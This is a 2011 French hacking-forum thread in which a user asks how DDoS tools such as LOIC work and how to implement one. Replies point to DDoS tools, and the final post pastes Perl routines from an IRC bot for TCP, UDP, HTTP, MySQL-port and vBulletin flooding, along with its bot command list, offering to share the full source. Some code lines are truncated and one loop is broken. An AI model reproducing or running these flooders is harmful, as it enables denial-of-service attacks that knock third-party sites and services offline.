Crack-wifi.com FORUM

LE FORUM DU SITE

Wifi, Backtrack, crack WEP et WPA...

Vous n'êtes pas identifié(e).  

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

#1 09-09-2011 11:36:40

ubuntrue
Membre Radioactif
Inscription : 18-08-2011
Messages : 85

[DDoS] implémenter un ddos

Salut à vous smile,

je ne savais pas trop si je devais poster ce sujet dans cette catégorie mais finalement je m'y suis décidé ^^, en fait je me pose des questions avec le DDoS, par exemple LOIC comment implémente-t-il un DDoS, que fait-il ? ( Je ne trouve toujours pas son code source ), car il me semble très simple de faire un DDoS : de multiple ping 6500 viennent rapidement à bout d'un site avec un script bash ou une petite application C ( avec plusieurs machines c'est encore mieux ! ), je me demande ce que fait LOIC, simplement des dizaines de ping ? Ou alors l'envoit de paquet se fait d'une manière plus subtile (peut-être anonyme ?) entièrement implémentée dans LOIC même ( et c'est dans ce cas que j'aimerais voir ce qu'il fait ) ?

Merci d'avance :-). Si vous aviez le code source de LOIC pour linux car je crois que ça existe ( et en plus que c'est du python ! ) maintenant ( ou même windows mais c'est du  c# ... ) je vous en serais très reconnaissant ^^.

PS : je n'ai aucune mauvaise intention c'est seulement pour bidouiller un truc.

Hors Ligne

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

#2 09-09-2011 11:41:29

ubuntrue
Membre Radioactif
Inscription : 18-08-2011
Messages : 85

Re : [DDoS] implémenter un ddos

Il semblerait que j'ai fait une petite erreur ... je vois 3 thread yikes. Désolé hmm .

Je ne sais pas ce qu'il s'est passé sad j'ai eu un message du genre "insert word incorrect" ou quelque chose du genre  et j'ai refait la manip pour créer le thread et visiblement il a été dupliqué ...
J'avoue que je ne sais pas trop ce que j'ai fait hmm


[Edit modération] Voilà, c'est nettoyé, même si l'erreur ne me dit rien non plus -- Antares145

edit : ok merci antares smile.

Dernière modification par ubuntrue (09-09-2011 16:22:51)

Hors Ligne

#3 11-09-2011 13:18:23

ixigrec
Nouveau membre
Inscription : 11-09-2011
Messages : 5

Re : [DDoS] implémenter un ddos

Bonjour,

Un nouvel outil de DDoS remplace LOIC, il s'agit de #RefRef, le code source est également disponible sur pastebin et quelques explications complémentaires sont disponibles sur le  blog NopSec wink


C’est en parlant haut qu’on devient haut-parleur! (Mouna Aguigui)

Hors Ligne

#4 11-09-2011 13:41:10

ixigrec
Nouveau membre
Inscription : 11-09-2011
Messages : 5

Re : [DDoS] implémenter un ddos

Quant au code pour LOIC, c'est sur sourceforge. Une analyse de l'outil se trouve ..et Google est ton ami. smile

Dernière modification par ixigrec (11-09-2011 13:45:56)


C’est en parlant haut qu’on devient haut-parleur! (Mouna Aguigui)

Hors Ligne

#5 12-09-2011 17:49:41

coyotus
Membre Irremplaçable
Lieu : fort fort lointain
Inscription : 05-08-2010
Messages : 884

Re : [DDoS] implémenter un ddos

ubuntrue a écrit :

Si vous aviez le code source de LOIC pour linux car je crois que ça existe ( et en plus que c'est du python ! ) maintenant ( ou même windows mais c'est du  c# ... ) je vous en serais très reconnaissant ^^.

PS : je n'ai aucune mauvaise intention c'est seulement pour bidouiller un truc.

pythonloic et loiq pour linux

regarde les réponses du poste du lien.


1310812721.gif

Hors Ligne

#6 12-09-2011 19:02:10

ubuntrue
Membre Radioactif
Inscription : 18-08-2011
Messages : 85

Re : [DDoS] implémenter un ddos

Parfait merci bien à vous smile

Hors Ligne

#7 22-12-2011 12:48:57

evilcode
N00b
Inscription : 17-02-2010
Messages : 4

Re : [DDoS] implémenter un ddos

Salut Ubuntrue,

Voila une solution bcp plus simple pour faire un Ddos, et à partir d'un server IRC ('mirc') via un bot perl ce qui rends la tache plus anonyme smile) (je ne vais pas poster le code source, car je ne sais pas si j'ai le droit ou pas, mais si tu veux voir la source une demande, et je le paste.

voici la section qui fait le ddos dans le bot & voici les commands :

#-----[DDos Based]-----
# !bot @udpflood <host> <packet size> <time>
# !bot @tcpflood <host> <port> <packet size> <time>
# !bot @httpflood <host> <time>
# !bot @sqlflood <host> <time>
# !bot @vbulletin_flood <host>


#############
#   CODE SOURCE  #
#############

Voici les sections résponsable du Ddos cmd ('non pas toute la source'):

##################
#     TCPFlood                  #
##################

         if ($funcarg =~ /^tcpflood\s+(.*)\s+(\d+)\s+(\d+)/) {
            sendraw($IRC_cur_socket, "PRIVMSG $printl :^C12[^B^C4@^C3TCP-DDOS^B^C12] Attacking ^C4 ".$1.":".$2." ^C$
            my $itime = time;
            my ($cur_time);
            $cur_time = time - $itime;
            while ($3>$cur_time){
               $cur_time = time - $itime;
               &tcpflooder("$1","$2","$3");
            }
            sendraw($IRC_cur_socket,"PRIVMSG $printl :^C12[^B^C4@^C3TCP-DDOS^B^C12] Attack done ^C4 ".$1.":".$2."."$
         }
######################
#  End of TCPFlood                    #
######################
######################
#               SQL Fl00dEr             #
######################
if ($funcarg =~ /^sqlflood\s+(.*)\s+(\d+)/) {
sendraw($IRC_cur_socket, "PRIVMSG $printl :^C12[^B^C4@^C3SQL-DDOS^B^C12] Attacking^C ^C4 ".$1." ^C12 on port 3306 f$
my $itime = time;
my ($cur_time);
$cur_time = time - $itime;
while ($2>$cur_time){
$cur_time = time - $itime;
   my $socket = IO::Socket::INET->new(proto=>'tcp', PeerAddr=>$1, PeerPort=>3306);
   print $socket "GET / HTTP/1.1\r\nAccept: */*\r\nHost: ".$1."\r\nConnection: Keep-Alive\r\n\r\n";
close($socket);
}
sendraw($IRC_cur_socket, "PRIVMSG $printl :^C12[^B^C4@^C3SQL-DDOS^B^C12] Attacking done^C ^C4 ".$1.".");
}
######################
#               VB Dd0s                  #
######################
if ($funcarg =~ /^vbulletin_flood\s+(.*)\s+(\d+)/) {
use Socket;
if (@ARGV < 2) { &usage }
$rand=rand(10);
$host = $ARGV[0];
$dir = $ARGV[1];
$host =~ s/(http:\/\/)//eg;
for ($i=0; $i<10; $i--)
{
$user="vb".$rand.$i;
$data = "s="
;
$len = length $data;
$foo = "POST ".$dir."index.php HTTP/1.1\r\n".
"Accept: * /*\r\n".
"Accept-Language: en-gb\r\n".
"Content-Type: application/x-www-form-urlencoded\r\n".
"Accept-Encoding: gzip, deflate\r\n".
"User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)\r\n".
"Host: $host\r\n".
"Content-Length: $len\r\n".
"Connection: Keep-Alive\r\n".
"Cache-Control: no-cache\r\n\r\n".
"$data";
my $port = "80";
my $proto = getprotobyname('tcp');
socket(SOCKET, PF_INET, SOCK_STREAM, $proto);
connect(SOCKET, sockaddr_in($port, inet_aton($host))) || redo;
send(SOCKET,"$foo", 0);
syswrite STDOUT, "+" ;
}
print "\n\n";
system('ping $host');
sub usage {
print "\tusage: \n";
print "\t$0 \n";
print "\tex: $0 127.0.0.1 /forum/\n";
print "\tex2: $0 127.0.0.1 /\n\n";
exit();
};
#################
#     HTTPFlood              #
#################
         if ($funcarg =~ /^httpflood\s+(.*)\s+(\d+)/) {
            sendraw($IRC_cur_socket, "PRIVMSG $printl :^C4|^C12.:^C3HTTP DDoS^C12:.^C4|^C12 Attacking ^C4 ".$1." ^C$
            my $itime = time;
            my ($cur_time);
            $cur_time = time - $itime;
            while ($2>$cur_time){
               $cur_time = time - $itime;
               my $socket = IO::Socket::INET->new(proto=>'tcp', PeerAddr=>$1, PeerPort=>80);
               print $socket "GET / HTTP/1.1\r\nAccept: */*\r\nHost: ".$1."\r\nConnection: Keep-Alive\r\n\r\n";
               close($socket);
            }
            sendraw($IRC_cur_socket, "PRIVMSG $printl :^C4|^C12.:^C3HTTP DDoS^C12:.^C4|^C12 Attacking done ^C4 ".$1$
         }
##################
#  End of HTTPFlood          #
##################
##################
#     UDPFlood                 #
##################
         if ($funcarg =~ /^udpflood\s+(.*)\s+(\d+)\s+(\d+)/) {
            sendraw($IRC_cur_socket, "PRIVMSG $printl :^C4|^C12.:^C3UDP DDoS^C12:.^C4|^C12 Attacking ^C4 ".$1." ^C1$
            my ($dtime, %pacotes) = udpflooder("$1", "$2", "$3");
            $dtime = 1 if $dtime == 0;
            my %bytes;
            $bytes{igmp} = $2 * $pacotes{igmp};
            $bytes{icmp} = $2 * $pacotes{icmp};
            $bytes{o} = $2 * $pacotes{o};
            $bytes{udp} = $2 * $pacotes{udp};
            $bytes{tcp} = $2 * $pacotes{tcp};
            sendraw($IRC_cur_socket, "PRIVMSG $printl :^C4[^B^C4@^C3UDP-DDos^B^C12]^C12 ^C12Results^C4 ".int(($byte$
         }
##################
#  End of Udpflood            #
##################

j'esperes que cette solution peut te convenir, j'attends ton message pour la suite.


P.S: On peut trouver des source plus ou moin identique sur le net, mais il faut faire attention car la majorité sont coder pour vous injécter VOUS avant les autres smile)


Hack To Learn, Not Learn To Hack !

Hors Ligne

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

Sujets similaires

Pied de page des forums


Le coin des bonnes affaires, achats informatiques:


|   Alfa 1000 mW AWUS036H   |    Linksys WRT54GL   |    Misco, informatique   |   
 |    Ebay   |    PC portables   |    PC Gamers & Tuning   |    Cles USB   |   
|   Disques durs externes 2 To   |   
|   Wifi-highpower.com   |   


Server Stats - [ Generated in 0.029 seconds ]   Forum Stat - [ Most users ever online on the forum was : 150 on 20-09-2009 17:06:59 ]